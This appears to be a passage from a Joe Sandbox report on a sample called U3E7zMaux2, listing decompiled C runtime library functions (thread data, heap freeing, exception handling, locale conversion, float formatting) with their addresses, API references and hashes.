Opcode Fuzzy Hash: d22ffe9363a6998e1e2d35ed5cd282cdf03ba47786016133a39b01d8c6c55dd1
Instruction Fuzzy Hash: 30014B71001109BBDF126F52CC41EAB3F6AEF04354F04842AFC18241A2D73ADDB1DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409011, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00409011(void* __edx, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				void* __ebp;
				intOrPtr* _t15;
				intOrPtr* _t18;
				void* _t22;
				void* _t24;

				_t23 = __edx;
				_t30 =  *((intOrPtr*)( *_a4)) - 0xe0434f4d;
				if( *((intOrPtr*)( *_a4)) == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E00407DEA(_t22, __edx, _t24, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E00407DEA(_t22, __edx, _t24, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L9;
				} else {
					__eflags = __eax - 0xe06d7363;
					if(__eflags != 0) {
						L9:
						__eflags = 0;
						return 0;
					} else {
						 *(E00407DEA(__ebx, __edx, __edi, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
						_push(8);
						_push(0x417900);
						E00404CA4(_t22, _t24, __esi);
						_t18 =  *((intOrPtr*)(E00407DEA(_t22, __edx, _t24, _t30) + 0x78));
						if(_t18 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t18();
							_v8 = 0xfffffffe;
						}
						return E00404CE9(E00407A0C(_t22, _t23, _t24));
					}
				}
			}

0x00409011
0x0040901d
0x00409022
0x00409041
0x00409048
0x0040904f
0x00409054
0x00409054
0x00409054
0x00000000
0x00409024
0x00409024
0x00409029
0x00409056
0x00409056
0x00409059
0x0040902b
0x00409030
0x00402d22
0x00402d24
0x00402d29
0x00402d33
0x00402d38
0x00402d3a
0x00402d3e
0x00402d49
0x00402d49
0x00402d5a
0x00402d5a
0x00409029

APIs

__getptd.LIBCMT ref: 0040902B

Part of subcall function 00407DEA: __getptd_noexit.LIBCMT ref: 00407DED
Part of subcall function 00407DEA: __amsg_exit.LIBCMT ref: 00407DFA

__getptd.LIBCMT ref: 0040903C
__getptd.LIBCMT ref: 0040904A

Strings

MOC, xrefs: 0040901D
csm, xrefs: 00409024

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: 11767864087e168163906b1a0de3cd6c6b269685fe490d3a212fb729674d7c71
Instruction ID: 2f9870fb3be34a46d21f7336d4a87d499bc5d8695982def442e6db769c8808d2
Opcode Fuzzy Hash: 11767864087e168163906b1a0de3cd6c6b269685fe490d3a212fb729674d7c71
Instruction Fuzzy Hash: C1E01A319041088FDB11BA65C04ABBA3794EF95318F5541B7A808E73A3D77CEC50954B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A8E1, Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0040A8E1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x417d00);
				E00404CA4(__ebx, __edi, __esi);
				_t31 = E00407DEA(__ebx, __edx, __edi, _t35);
				_t15 =  *0x419cac; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E004041AD(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x419bb0; // 0x571600
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x419788;
								if(__eflags != 0) {
									_push(_t33);
									E00403E85(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x419bb0; // 0x571600
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x419bb0; // 0x571600
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0040A97C();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00404EEC(_t29, _t31, 0x20);
				}
				return E00404CE9(_t33);
			}

0x0040a8e1
0x0040a8e1
0x0040a8e1
0x0040a8e1
0x0040a8e3
0x0040a8e8
0x0040a8f2
0x0040a8f4
0x0040a8fc
0x0040a91d
0x0040a923
0x0040a927
0x0040a92a
0x0040a92d
0x0040a933
0x0040a935
0x0040a937
0x0040a93a
0x0040a940
0x0040a942
0x0040a944
0x0040a94a
0x0040a94c
0x0040a94d
0x0040a952
0x0040a94a
0x0040a942
0x0040a953
0x0040a958
0x0040a95b
0x0040a961
0x0040a965
0x0040a965
0x0040a96b
0x0040a972
0x0040a904
0x0040a904
0x0040a904
0x0040a909
0x0040a90d
0x0040a912
0x0040a91a

APIs

__getptd.LIBCMT ref: 0040A8ED

Part of subcall function 00407DEA: __getptd_noexit.LIBCMT ref: 00407DED
Part of subcall function 00407DEA: __amsg_exit.LIBCMT ref: 00407DFA

__amsg_exit.LIBCMT ref: 0040A90D
__lock.LIBCMT ref: 0040A91D
InterlockedDecrement.KERNEL32(?), ref: 0040A93A
InterlockedIncrement.KERNEL32(00571600), ref: 0040A965

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 08eb0d1a302fd91a845e8d6d2666b5aa41e59918724028f8ab9b6c1666b165c5
Instruction ID: b3c779945043428d5b5bc56fd1bff1f59bc305e2d049ec647f3379f663c75103
Opcode Fuzzy Hash: 08eb0d1a302fd91a845e8d6d2666b5aa41e59918724028f8ab9b6c1666b165c5
Instruction Fuzzy Hash: 7B01CEB1A007119BCA11AB26A4167AE77A0BF80714F02813BE810B72C0C73CAE51CBDE

Uniqueness

Uniqueness Score: -1.00%

Function 00403E85, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 41%

			E00403E85(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x4179a8);
				_t8 = E00404CA4(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E00404CE9(_t8);
				}
				if( *0x441258 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x43b2fc, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E00403DD4(_t31);
						 *_t10 = E00403D92(GetLastError());
					}
					goto L9;
				}
				E004041AD(__ebx, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E004041E0(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E00404210();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E00403EDB();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x00403e85
0x00403e87
0x00403e8c
0x00403e91
0x00403e96
0x00403f0d
0x00403f12
0x00403f12
0x00403e9f
0x00403ee4
0x00403ee5
0x00403eed
0x00403ef3
0x00403ef5
0x00403ef7
0x00403f0a
0x00403f0c
0x00000000
0x00403ef5
0x00403ea3
0x00403ea9
0x00403eae
0x00403eb4
0x00403eb9
0x00403ebb
0x00403ebc
0x00403ebd
0x00403ec3
0x00403ec4
0x00403ecb
0x00403ed4
0x00000000
0x00403ed6
0x00403ed6
0x00000000
0x00403ed6

APIs

__lock.LIBCMT ref: 00403EA3

Part of subcall function 004041AD: __mtinitlocknum.LIBCMT ref: 004041C3
Part of subcall function 004041AD: __amsg_exit.LIBCMT ref: 004041CF
Part of subcall function 004041AD: EnterCriticalSection.KERNEL32(00407D8D,00407D8D,?,00403F94,00000004,004179C8,0000000C,00409FAE,00000001,00407D9C,00000000,00000000,00000000,?,00407D9C,00000001), ref: 004041D7

___sbh_find_block.LIBCMT ref: 00403EAE
___sbh_free_block.LIBCMT ref: 00403EBD
HeapFree.KERNEL32(00000000,00000001,004179A8,0000000C,0040418E,00000000,004179E8,0000000C,004041C8,00000001,00407D8D,?,00403F94,00000004,004179C8,0000000C), ref: 00403EED
GetLastError.KERNEL32(?,00403F94,00000004,004179C8,0000000C,00409FAE,00000001,00407D9C,00000000,00000000,00000000,?,00407D9C,00000001,00000214), ref: 00403EFE

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 478a8f684bd52ebb28b33c4e417589dff8c5514537c62e3dc24430da99fcb3f8
Instruction ID: 7cc083815b3db68a2ab588b4e5f884dd1ad04c3cf26d3cb0ea11eb0a75816897
Opcode Fuzzy Hash: 478a8f684bd52ebb28b33c4e417589dff8c5514537c62e3dc24430da99fcb3f8
Instruction Fuzzy Hash: 71018471905201A6DB206FB2A80AB5E7E68AF4075AF20457FF200B61D0DB7C8B808A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D24E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040D24E() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x415ec8;
					_v28 =  *0x415ec0;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x0040d253
0x0040d25b
0x0040d272
0x0040d21e
0x0040d227
0x0040d233
0x0040d236
0x0040d239
0x0040d23b
0x0040d23e
0x0040d243
0x0040d24d
0x0040d245
0x0040d249
0x0040d249
0x0040d25d
0x0040d263
0x0040d26b
0x00000000
0x0040d26d
0x0040d26d
0x0040d271
0x0040d271
0x0040d26b

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040704A), ref: 0040D253
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040D263

Strings

KERNEL32, xrefs: 0040D24E
IsProcessorFeaturePresent, xrefs: 0040D25D

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 55a6fe8518cb327bbcdf9397cabf93a9abfb7cc9b6e6c52d223b4506b6ed6081
Instruction ID: 9efea2eb6013721e7f1f584b46ce53b402d0aa4525c3d983b600c4443d76a6d5
Opcode Fuzzy Hash: 55a6fe8518cb327bbcdf9397cabf93a9abfb7cc9b6e6c52d223b4506b6ed6081
Instruction Fuzzy Hash: FBF01730E00A09D2DF106BE1AD0A6EF7EB9BBC4746F9245A5D192B00C8DF74C5B5824A

Uniqueness

Uniqueness Score: -1.00%

Function 004023BF, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E004023BF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v0;
				signed int _v4;
				char _v40;
				char _v80;
				char* _t21;
				char* _t25;

				_push(0x44);
				E0040384A(E00412F1E, __ebx, __edi, __esi);
				E00401AB8( &_v40, "invalid string position");
				_v4 = _v4 & 0x00000000;
				_t21 =  &_v80;
				E00402338(_t21,  &_v40);
				E004033FB( &_v80, 0x4177e8);
				asm("int3");
				_push(__esi);
				_t25 = _t21;
				 *((intOrPtr*)(_t25 + 0x18)) = 0xf;
				E00401D13(_t21, 0);
				E00401AEE(_t25, _v0, 0, 0xffffffff);
				return _t25;
			}

0x004023bf
0x004023c6
0x004023d3
0x004023d8
0x004023e0
0x004023e3
0x004023f1
0x004023f6
0x004023fc
0x004023fd
0x00402401
0x00402408
0x00402416
0x0040241f

APIs

__EH_prolog3.LIBCMT ref: 004023C6
std::bad_exception::bad_exception.LIBCMT ref: 004023E3

Part of subcall function 00402338: std::runtime_error::runtime_error.LIBCPMT ref: 00402343

__CxxThrowException@8.LIBCMT ref: 004023F1

Part of subcall function 004033FB: RaiseException.KERNEL32(?,?,004031B8,?,?,?,?,?,004031B8,?,00417F08,0043B188,?,004021F8,?,00000006), ref: 0040343D

Strings

invalid string position, xrefs: 004023CB

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
String ID: invalid string position
API String ID: 3299838469-1799206989
Opcode ID: eefae91d2a81b2b54a575dc389ad0ab65671b06947c5d296a0d274f49d0bd1d7
Instruction ID: e8cfae42ab86e9b17e7ba030cf8ed8475fceaa601c45a77c80bea1507eb301e9
Opcode Fuzzy Hash: eefae91d2a81b2b54a575dc389ad0ab65671b06947c5d296a0d274f49d0bd1d7
Instruction Fuzzy Hash: C6D0EC71940208A6CB04EAE1C846BDDB778AB14706F50003AB201B60C2DFBC96848718

Uniqueness

Uniqueness Score: -1.00%

Function 004107E2, Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004107E2(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040540F( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E0040C350( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00403DD4(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x004107ec
0x004107f3
0x0041080a
0x00000000
0x004107fa
0x004107fc
0x00410816
0x0041081b
0x0041081e
0x00410821
0x0041084a
0x00410851
0x00410853
0x004108d4
0x004108ef
0x004108f1
0x00410831
0x00410831
0x00410834
0x00410836
0x00410839
0x00410839
0x00410839
0x00410839
0x00000000
0x0041083f
0x004108b3
0x004108b3
0x004108b8
0x004108be
0x004108c1
0x004108c3
0x004108c6
0x004108c6
0x004108c6
0x004108c6
0x00000000
0x004108ca
0x00410855
0x00410858
0x0041085e
0x00410861
0x00410888
0x0041088b
0x00410891
0x00000000
0x00000000
0x00410893
0x00410896
0x00000000
0x00000000
0x00410898
0x00410898
0x0041089e
0x004108a1
0x0041080f
0x0041080f
0x004108aa
0x00000000
0x004108aa
0x00410863
0x00410866
0x00000000
0x00000000
0x0041086a
0x0041087b
0x00410881
0x00410883
0x00410886
0x00000000
0x00000000
0x00000000
0x00410886
0x00410823
0x00410826
0x00410828
0x0041082e
0x0041082e
0x00000000
0x004107fe
0x004107fe
0x00410803
0x00410807
0x00410807
0x00000000
0x00410803
0x004107fc

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00410816
__isleadbyte_l.LIBCMT ref: 0041084A
MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,?,00000000,00000000,?,?,?,?,00000000,00000000,00000020), ref: 0041087B
MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,00000001,00000000,00000000,?,?,?,?,00000000,00000000,00000020), ref: 004108E9

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 1a59673346ebed4accbe3c139cbab39f2618d1c3dc37b78315fef671d67b083f
Instruction ID: d4a59609efa29d9dedb9ee76d19c595afa5874e5aa1195f0a2104ac0640b7952
Opcode Fuzzy Hash: 1a59673346ebed4accbe3c139cbab39f2618d1c3dc37b78315fef671d67b083f
Instruction Fuzzy Hash: 2031B131A08246EFDB20EFA4C880AEA7BB5EF01311B14856AE4559B291D7B4DDC1DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D13A, Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040D13A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0040CA2B(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0040CB1B(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0040D040(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0040CF85(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x0040d13f
0x0040d145
0x0040d1b8
0x00000000
0x0040d14c
0x0040d14c
0x0040d14f
0x0040d16a
0x0040d16d
0x0040d18d
0x0040d19f
0x0040d16f
0x0040d16f
0x0040d172
0x00000000
0x0040d174
0x0040d186
0x0040d186
0x0040d172
0x0040d1bd
0x0040d1c1
0x0040d151
0x0040d169
0x0040d169
0x0040d14f

APIs

__cftof_l.LIBCMT ref: 0040D160

Part of subcall function 0040CF85: __fltout2.LIBCMT ref: 0040CFB1

__cftog_l.LIBCMT ref: 0040D186
__cftoe_l.LIBCMT ref: 0040D1B8

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 2304b99cc5cdf224082c553df4e8fdb397f50b7084f02afe76ee580aa34f26fa
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 41117E7240014ABBCF125FC4DC41CEE3F22BF18394B588526FE18691B1C73AC9B6AB85

Uniqueness

Uniqueness Score: -1.00%

Function 0040B04D, Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0040B04D(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x417d40);
				E00404CA4(__ebx, __edi, __esi);
				_t28 = E00407DEA(__ebx, __edx, __edi, _t30);
				_t13 =  *0x419cac; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E004041AD(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x419d90; // 0x419cb8
					 *((intOrPtr*)(_t29 - 0x1c)) = E0040B00F(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E0040B0B7();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00407DEA(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E00404EEC(_t25, _t26, 0x20);
				}
				return E00404CE9(_t28);
			}

0x0040b04d
0x0040b04d
0x0040b04d
0x0040b04d
0x0040b04d
0x0040b04f
0x0040b054
0x0040b05e
0x0040b060
0x0040b068
0x0040b08c
0x0040b08e
0x0040b094
0x0040b098
0x0040b09b
0x0040b0a6
0x0040b0a9
0x0040b0b0
0x0040b06a
0x0040b06a
0x0040b06e
0x00000000
0x0040b070
0x0040b075
0x0040b075
0x0040b06e
0x0040b07a
0x0040b07e
0x0040b083
0x0040b08b

APIs

__getptd.LIBCMT ref: 0040B059

Part of subcall function 00407DEA: __getptd_noexit.LIBCMT ref: 00407DED
Part of subcall function 00407DEA: __amsg_exit.LIBCMT ref: 00407DFA

__getptd.LIBCMT ref: 0040B070
__amsg_exit.LIBCMT ref: 0040B07E
__lock.LIBCMT ref: 0040B08E

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 337ba3acd6974c1b79e366f9b2872e32416291eabac398ab7429648d83525adb
Instruction ID: da94c85d111bcd631e86d88fbed851a3fb7c4caf6521eff3f12f1db841eba2ba
Opcode Fuzzy Hash: 337ba3acd6974c1b79e366f9b2872e32416291eabac398ab7429648d83525adb
